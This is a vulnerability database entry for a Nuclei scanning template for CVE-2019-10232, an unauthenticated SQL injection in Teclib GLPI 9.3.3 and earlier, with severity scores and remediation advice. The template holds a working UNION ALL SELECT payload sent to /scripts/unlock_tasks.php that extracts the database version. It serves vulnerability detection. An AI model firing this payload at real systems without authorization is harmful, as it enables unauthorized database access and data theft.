Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-10232
HistoryNov 13, 2021 - 2:26 p.m.

Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection

2021-11-1314:26:16
ProjectDiscovery
github.com
11
teclib-edition
glpi
sqli
cve-2019-10232
unauthenticated
upgrade

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.121

Percentile

95.4%

Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records.

id: CVE-2019-10232

info:
  name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
  author: RedTeamBrasil
  severity: critical
  description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to a patched version of Teclib GLPI (9.3.4 or later) to mitigate this vulnerability.
  reference:
    - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
    - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10232
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/HimmelAward/Goby_POC
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-10232
    cwe-id: CWE-89
    epss-score: 0.12149
    epss-percentile: 0.95246
    cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: teclib-edition
    product: gestionnaire_libre_de_parc_informatique
  tags: cve,cve2019,glpi,sqli,injection,teclib-edition

http:
  - method: GET
    path:
      - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
      - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "-MariaDB-"
          - "Start unlock script"
        condition: and

    extractors:
      - type: regex
        regex:
          - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
        part: body
# digest: 4b0a00483046022100efff10a9f7ef07b0c26cf059ac132ff1bd1afdac52ce651b2e0b519e4207debd022100c1d21956a12aac1e196d8bc9e988ecff71dd81575e68f0572017946fccef80b2:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.121

Percentile

95.4%

Related for NUCLEI:CVE-2019-10232